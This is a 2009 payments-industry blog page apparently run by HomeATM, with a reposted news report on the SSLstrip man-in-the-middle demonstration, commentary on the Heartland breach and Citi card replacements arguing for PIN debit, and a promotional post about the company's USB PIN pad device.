Friday, February 20, 2009

Reasercher Demo's SSL Attack (Still Can't Hack the PIN)

As the name implies, "Browsers" are for "browsing" ...when you're done and it comes time to make that online should be done "outside the browser." 

I posted earlier this year (Browsers and E-Commerce Don't Mix - January 2nd  2009) that researches disclosed that a
key piece of Internet technology that banks, e-commerce sites, and financial institutions rely on to keep transactions safe suffers from a serious security vulnerability. 

They demonstrated how to forge security certificates used by secure Web sites, a process that would allow a sufficiently sophisticated criminal to fool the built-in verification methods used by all modern Web browsers--without the user being alerted that anything was amiss. 

They also said it was unlikely to affect most Internet users in the "near future" because taking advantage of the vulnerability requires discovering some techniques that "are not expected to be made public." 

Oh really...?  Well that's good news!   Oops!  Wanna watch the video on YouTube?  It's embedded at the end of this post...

Researcher demonstrates SSL attack
By Tom Espiner
Posted on ZDNet News: Feb 20, 2009

A security researcher has demonstrated a way to hijack Secure Sockets Layer (SSL) sessions to intercept login data.

Moxie Marlinspike
, who spoke at the Black Hat security conference on Wednesday, explained how to subvert an SSL session by performing a man-in-the-middle attack. The anarchist researcher explained in a YouTube video that the attack uses a tool developed called SSLstrip, which exploits the interface between http and https sessions.

"SSLstrip man-in-the-middles all of the potential SSL connections on the network, specifically attacking the bridge between http and https,"Marlinspike said in the video. (embedded at the end of this post)

Secure Sockets Layer, and its successor Transport Layer Security, are cryptographic protocols used to encrypt communications over TCP/IP networks. SSL and TLS are often used by banks and other organizations to secure web transactions.

The attack relies on users not directly calling up an SSL session by typing a URL into a browser. Most users initiate sessions by clicking on a button. These buttons are located on unencrypted http pages, and clicking on them will take users to encrypted https pages to log in.

"That opens up all kinds of avenues for ways that you might intercept [details]," Marlinspike said. In his Black Hat presentation, he claimed to have gathered details on 117 email accounts, seven PayPal logins and 16 credit card numbers, within a 24 hour period.

SSLstrip works by watching http traffic, then by acting as a proxy when a user attempts to initiate an https session. While the user believes the secure session has been initiated, and SSLstrip has connected to the secure server via https, all traffic between the user and SSLstrip is http. This means "disastrous warnings" displayed by browsers are avoided, as to the browser the session appears normal. Login details can then be harvested.

Marlinspike said that an https padlock logo can be spoofed in the URL bar, to further lull the user into a false sense of security.

While SSL is generally accepted as being secure, security researchers have claimed SSL communications can be intercepted.  In August last year, researcher Mike Perry said he had been in discussions with Google regarding an exploit he planned to release, which would allow a hacker to intercept a user's communications with supposedly secure websites over an unsecured Wi-Fi network.

This article was originally posted on

Reblog this post [with Zemanta]

Citi Replacing Cards After Breach...but How Many?

According to the Press Association, Citigroup has started sending replacement credit cards to its customers, apparently in response to a massive security breach at Heartland Payment Systems.

"Heartland Payment Systems revealed that its system used to process Visa, MasterCard, American Express and Discover Card transactions was breached late last year.  The Princeton, New Jersey, company said the breach did not involve  personal identification numbers (PINs)"

(Editor's Note:  Translation for They didn't get the PIN's.  What If banks and V/MC  had pushed the more secure "PIN Debit, instead of pushing the less secure "signature debit"?  Sure, their excessive profit's derived from higher interchange fees and the milking of $17 Billion dollars off consumers from overdraft charges was nice but now it's kinida biting them in the *ss.  I guess there is a price to pay when self-interests are given priority over what's best in the long run.  What's best in the long run is securing at the end of the day, this dilemma has been exacerbated by their own self-serving modus-operandi.

Earlier this week I posted that every $100 of PIN based transactions there was 1.09 cents of fraud.  Signature debit comes in at 5.4 cents.

It will be interesting to see how drastically those numbers shift after the final tally on how much this breach winds up costing. Don't expect anything too drastic wouldn't be in V/MC's best interest if those numbers become any more disparate.

Prediction 1: The new signature debit fraud numbers WILL NOT include costs associated with replacing cards and monitoring accounts...only the actual amounts of fraud committed using the breached card numbers. They want to keep these numbers as low as possible.

Prediction 2:  The PIN debit fraud number's will always include every single penny derived from skimming, tampering, the use of camera's, people foolish enough to provide their PIN's to scam artists, and if they could, they'd include ATM Bombs.  V/MC will manipulate the data in order to skew these numbers to appear as high as possible, to keep people from questioning their mindset in pushing SigDebit over PINDebit.

Predilection 101: Visa and MasterCard will continue to push whatever makes them the most money.

Prediction 3:  Because of their aforementioned predilection, V/MC will be involved in yet another Antitrust lawsut, drag it on for as long as possible, and settle for about a third of what they wrongfully profited while they dragged it out over the years on the morning the case is scheduled to begin.  OR...they will see the light of day and determinie that their strategy won't hold up in the long term, and having learned from past mistakes, work with the other EFT networks (Visa owns Interlink/MC owns Maestro) and empower PIN Debit instead of fraudsters.  Flip a coin. many cards will Citi have to replace?  Citibank has not revealed how many of its customers are involved however...Citi has more than 150 million credit card accounts worldwide.

Meanwhile...the growing number of banks across the US have that have said their customers were involved in the Heartland breach and have issued new cards to consumers has climbed to 440+. . The rest are still monitoring their systems for unusual activity to detect fraud.

Please take a moment to participate in our poll
You will be able to view results after voting.

Reblog this post [with Zemanta]

HomeATM Plans On Participating in FinovateStartup09

HomeATM has committed to attend Finovate Startup '09
and plans on participating as one of the presenting company's as well. 

To learn more about Finovate Startup ''09 and Finovate '09 you may visit either or

HomeATM in the News


Heightened attention to data breaches tied to point-of-sale software and online shopping carts is bolstering a security-engineering company's argument that the use of PINs on the Internet can be done securely only using a payment card terminal that (easily) attaches to consumers' personal computers. (in milliseconds)

HomeATM ePayment Solutions, which is based in Montreal, is close to piloting a personal card-swipe device and PIN pad that consumers plug directly into a PC's USB port. The system requires no installation or software. When consumers check out at a participating merchant's Web site, the site prompts them to use the device to swipe their card and enter their PIN to complete a transaction. If a retailer conducts a successful pilot, the hardware will provide peace of mind for the consumer while turning card-not-present interchange rates to cheaper card-present rates for merchants, contends Kenneth Mages, HomeATM chairman and CEO. The company has an agreement with a major electronic funds network to begin the pilot, but first HomeATM wants to secure participation from a large, Tier 1 merchant, Mages says. Tier 1, or Level 1, merchants process more than 6 million transactions per year. The company is considering several merchants, including a major U.S.-based airline, which Mages declined to name. The device, called SafeTPIN, received Payment Card Industry Data Security Standard certification two weeks ago.

Editor's Note:
  The headline can be a little misleading. We don't "PLAN TO TEST" the device.  We tested it already.  Rigorously!  But, in order to prove our results were objective, it was thoroughly tested by a fully accredited outside resource.This from the Witham Laboratories website:

One of only eight in the world…

Among our many certifications, Witham Laboratories is the only organization in the Asia-Pacific region accredited by the PCI to test PIN Entry Devices (PEDs) - we are one of only eight organizations in the world with this accreditation. So, do we plan to pilot the device...yes.  Do we plan on testing it?  Done.

For more information on the accreditation process, visit Witham Labs.

For more information visit:

Reblog this post [with Zemanta]

Disqus for ePayment News